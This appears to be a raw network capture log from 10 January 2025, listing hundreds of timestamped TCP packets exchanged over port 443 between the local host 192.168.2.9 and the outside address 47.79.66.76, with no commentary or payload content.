                                                                                                Jan 10, 2025 07:52:11.905699015 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.905761957 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.905770063 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.905791044 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.905824900 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.905842066 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.911819935 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.911870956 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.911904097 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.911912918 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.911941051 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.911957026 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.948057890 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.948101997 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.948139906 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.948151112 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.948160887 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.948401928 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.950381994 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.950423956 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.950479984 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.950489998 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.950499058 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.950596094 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.961443901 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.961497068 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.961519003 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.961528063 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.961558104 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.961570024 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.983676910 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.983721972 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.983751059 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.983761072 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.983784914 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.983793974 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.987256050 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.987297058 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.987338066 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.987348080 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.987360001 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.987389088 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.992682934 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.992729902 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.992767096 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.992779016 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.992793083 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.992820024 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.998104095 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.998147011 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.998183966 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.998192072 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.998218060 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.998236895 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.004326105 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.004367113 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.004399061 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.004409075 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.004426003 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.004448891 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.040508986 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.040553093 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.040615082 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.040615082 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.040625095 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.040775061 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.042859077 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.042902946 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.042941093 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.042948008 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.042989016 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.042989016 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.053844929 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.053886890 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.053944111 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.053944111 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.053952932 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.053989887 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.076235056 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.076286077 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.076356888 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.076356888 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.076364994 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.076404095 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.079802036 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.079847097 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.079879045 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.079885960 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.079922915 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.079922915 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.085104942 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.085148096 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.085184097 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.085191011 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.085252047 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.085252047 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.090754986 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.090796947 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.090867043 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.090867043 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.090884924 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.091042042 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.096946001 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.096990108 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.097031116 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.097038031 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.097059011 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.097091913 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.133070946 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.133117914 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.133194923 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.133203030 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.133218050 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.133300066 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.135205984 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.135251045 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.135302067 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.135308981 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.135332108 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.135351896 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.146301031 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.146347046 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.146387100 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.146394014 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.146482944 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.146482944 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.168760061 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.168804884 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.168840885 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.168848038 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.168876886 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.168925047 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.172152996 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.172200918 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.172463894 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.172463894 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.172472954 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.172569990 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.177582026 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.177630901 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.177694082 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.177694082 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.177702904 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.177875042 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.183211088 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.183253050 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.183336020 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.183336020 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.183343887 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.183497906 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.189248085 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.189292908 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.189348936 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.189356089 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.189373970 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.189426899 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.225467920 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.225565910 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.225575924 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.225594997 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.225662947 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.225662947 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.227633953 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.227720976 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.227729082 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.227752924 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.227823973 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.227823973 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.238691092 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.238734961 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.238785982 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.238785982 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.238801956 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.238862991 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.261147976 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.261193037 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.261245012 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.261261940 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.261280060 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.261406898 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.264662981 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.264715910 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.264749050 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.264774084 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.264791012 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.264832973 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.270083904 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.270126104 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.270160913 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.270179033 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.270219088 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.270219088 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.275577068 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.275624037 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.275669098 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.275669098 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.275685072 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.275882959 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.281786919 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.281829119 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.281944036 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.281944036 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.281963110 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.282047987 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.317989111 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.318017960 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.318326950 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.318326950 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.318356037 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.318419933 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.320033073 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.320055008 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.320099115 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.320105076 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.320156097 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.320156097 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.330965042 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.330986977 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.331038952 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.331058979 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.331111908 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.331163883 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.353599072 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.353682041 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.353825092 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.353825092 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.353837013 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.354202986 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.357110977 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.357135057 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.357311964 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.357311964 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.357325077 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.357393026 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.362390995 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.362426043 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.362459898 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.362469912 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.362487078 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.362579107 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.368118048 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.368165016 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.368212938 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.368212938 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.368233919 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.368273973 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.374177933 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.374207973 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.374861002 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.374861002 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.374872923 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.375116110 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.410367012 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.410399914 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.410557985 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.410557985 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.410579920 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.410767078 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.412512064 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.412533998 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.412575006 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.412595987 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.412609100 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.412770987 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.423569918 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.423624039 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.423652887 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.423667908 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.423775911 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.423775911 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.446079016 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.446100950 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.446161985 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.446161985 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.446182013 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.446286917 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.449448109 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.449470043 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.449511051 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.449525118 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.449651957 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.449651957 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.454952002 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.454972029 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.455337048 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.455337048 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.455352068 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.455713987 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.460606098 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.460624933 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.460689068 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.460689068 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.460714102 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.461000919 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.466624975 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.466645956 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.466695070 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.466718912 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.466772079 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.466772079 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.502861023 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.502902985 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.503166914 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.503166914 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.503190994 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.503305912 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.505985975 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.506011009 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.506105900 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.506105900 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.506129980 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.506284952 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.515966892 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.516000032 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.516237974 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.516237974 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.516253948 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.516940117 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.538595915 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.538626909 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.538758993 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.538758993 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.538785934 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.538929939 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.541979074 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.542017937 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.542066097 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.542085886 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.542114973 CET49751443192.168.2.947.79.66.76
